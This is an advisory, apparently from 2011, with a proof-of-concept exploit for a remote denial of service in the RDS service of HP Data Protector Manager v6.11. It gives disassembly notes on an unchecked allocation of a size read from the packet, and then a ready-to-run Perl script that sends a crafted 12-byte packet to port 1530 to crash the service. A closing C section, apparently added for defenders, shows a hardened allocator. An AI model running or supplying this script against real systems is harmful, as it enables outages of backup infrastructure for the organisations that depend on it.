HP Data Protector Manager v6.11 Remote DoS in RDS Service
Source: http://www.pepelux.org  Author: Pepelux  Published: 2011-01-10


# ===============================
# HP Data Protector Manager v6.11
# ===============================
#
# Bug: Remote Denial of Service Vulnerabilities (RDS Service)
#
# Software: http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html
# Date: 08/01/2011
# Authors: Roi Mallo - rmallof[AT]gmail[DOT]com
#                   http://elotrolad0.blogspot.com/ - http://twitter.com/rmallof
#              Pepelux - pepelux[AT]enye-sec[DOT]com
#                   http://www.enye-sec.org - http://www.pepelux.org - http://twitter.com/pepeluxx
#
# Vulnerable file: Program Files\OmniBack\rds.exe
#
# Tested on Windows XP SP2 && Windows XP SP3
#
#
# POC:
# _ncp32.dll is responsible for receiving the packet (RECV).
# When a packet arrives, it calls into _rm32.dll to allocate memory for it
# using the size field taken from the packet itself. Because that size is
# far too large, malloc cannot satisfy it, returns NULL, and the program
# exits via rm_errorExit, killing the service.
#
# _ncp32.dll
# 00482F92   68 7DFAF908   PUSH 8F9FA7D
# 00482F97   6A 00             PUSH 0
# 00482F99   6A 01             PUSH 1
# 00482F9B   6A 00             PUSH 0
# 00482F9D   8B55 F8           MOV EDX,DWORD PTR SS:[EBP-8] ; packet size (64000000h)
# 00482FA0   52                 PUSH EDX
# 00482FA1   E8 9C2D0000 CALL <JMP.&_rm32.#20_rm_getMem>
#
#
# _rm32.dll
# 0038C49B   8B45 08           MOV EAX,DWORD PTR SS:[EBP+8] ; packet size (64000000h)
# 0038C49E   83C0 08           ADD EAX,8
# 0038C4A1   50                PUSH EAX
# 0038C4A2   FF15 F4733A00 CALL DWORD PTR DS:[<&MSVCR71.malloc>]    ; MSVCR71.malloc  --> Returns 0 because no space available
# ......
# 0038C5F9   50                 PUSH EAX
# 0038C5FA   68 2C0C3A00   PUSH _rm32.003A0C2C ; ASCII "rm_getMem: out of memory, allocating %u bytes. Called from %s"
#......
# 0038C64E   E8 8D220000      CALL _rm32.rm_errorExit

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

my ($server, $port) = @ARGV;

# The host is mandatory; the port is optional and defaults to 1530 (RDS).
unless (defined $server) {
    print "Usage: perl $0 <host> [port]\n";
    print "\tdefault port = 1530\n\n";
    exit 1;
}

$port = 1530 unless defined $port;

if ($^O =~ /Win/) { system("cls"); } else { system("clear"); }

# Packet layout: 4-byte fixed header, 4-byte length field, then data.
# The length bytes 64 00 00 00 match the 64000000h seen in the disassembly,
# i.e. the service reads the field in network byte order.
my $buf = "\x23\x8c\x29\xb6";   # header (always the same)
$buf   .= "\x64\x00\x00\x00";   # data packet size (too big)
$buf   .= "\x41" x 4;           # data

print "[+] Connecting to $server:$port ...\n";

my $sock1 = IO::Socket::INET->new(
    PeerAddr => $server,
    PeerPort => $port,
    Timeout  => 10,
    Proto    => 'tcp',
) or die "Server $server is not available.\n";

print "[+] Sending malicious packet ...\n";
print $sock1 $buf;
close($sock1);
print "\n[x] Server crashed!\n";
exit;
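The allocation path the disassembly above describes, reconstructed in C as an added example for defenders (this is not the PoC's code and not HP's code). It parses the 12-byte packet from the PoC, shows the unchecked malloc(size + 8) / rm_errorExit pattern the listing documents, and places a hardened allocator beside it that caps the request size, guards the size + 8 addition, and returns NULL instead of terminating the process. The big-endian reading of the length field is inferred from the PoC bytes agreeing with the disassembled value 64000000h; the 1 MiB cap and all function names are assumptions of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample: the 12 bytes the PoC sends
   (4-byte fixed header, 4-byte length field, 4 data bytes). */
const unsigned char SAMPLE_PKT[12] = {
    0x23, 0x8c, 0x29, 0xb6,   /* fixed header from the PoC */
    0x64, 0x00, 0x00, 0x00,   /* length: 0x64000000 when read big-endian */
    0x41, 0x41, 0x41, 0x41    /* data */
};

/* Upper bound on one request body. Hypothetical value for this example;
   a real limit comes from the protocol's own maximum message size. */
#define RDS_MAX_BODY (1u << 20)   /* 1 MiB */

/* Read the length field as a big-endian 32-bit value (assumption, see lead-in).
   Returns 0 if the packet is too short to contain a length field. */
uint32_t rds_read_len(const unsigned char *pkt, size_t pktlen) {
    if (pktlen < 8) return 0;
    return ((uint32_t)pkt[4] << 24) | ((uint32_t)pkt[5] << 16) |
           ((uint32_t)pkt[6] << 8)  |  (uint32_t)pkt[7];
}

/* The pattern the disassembly shows: the attacker-controlled size plus 8
   goes straight to malloc, and a NULL result ends in rm_errorExit, which
   takes the whole service down. Nothing bounds the size first. */
void *getmem_unchecked(uint32_t size) {
    void *p = malloc((size_t)size + 8);            /* ADD EAX,8 ; malloc */
    if (p == NULL) {
        fprintf(stderr, "rm_getMem: out of memory, allocating %u bytes\n", size + 8);
        exit(1);                                   /* stand-in for rm_errorExit */
    }
    return p;
}

/* Hardened variant: reject oversized requests, reject sizes whose +8 would
   wrap on a 32-bit build, and hand a NULL back to the caller instead of
   killing the process, so one client cannot deny service to all others. */
void *getmem_checked(uint32_t size) {
    if (size > RDS_MAX_BODY) return NULL;          /* protocol limit */
    if (size > UINT32_MAX - 8) return NULL;        /* size + 8 would overflow */
    return malloc((size_t)size + 8);               /* NULL only on real exhaustion */
}

/* Returns 1 if the checked allocator would accept this packet, 0 otherwise. */
int rds_accepts(const unsigned char *pkt, size_t pktlen) {
    uint32_t len = rds_read_len(pkt, pktlen);
    void *p = getmem_checked(len);
    if (p == NULL) return 0;
    free(p);
    return 1;
}

int main(void) {
    uint32_t len = rds_read_len(SAMPLE_PKT, sizeof SAMPLE_PKT);
    printf("length field = 0x%08x (%u bytes), accepted by checked allocator = %d\n",
           len, len, rds_accepts(SAMPLE_PKT, sizeof SAMPLE_PKT));
    /* getmem_unchecked is only called with a small size here; with the PoC's
       length it would attempt a ~1.6 GiB allocation and exit on failure. */
    free(getmem_unchecked(4));
    return 0;
}
```

The point of the checked version is not the specific cap but the order of operations: validate the length against a protocol maximum before it ever reaches the allocator, and treat allocation failure as a per-request error rather than a fatal one.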
 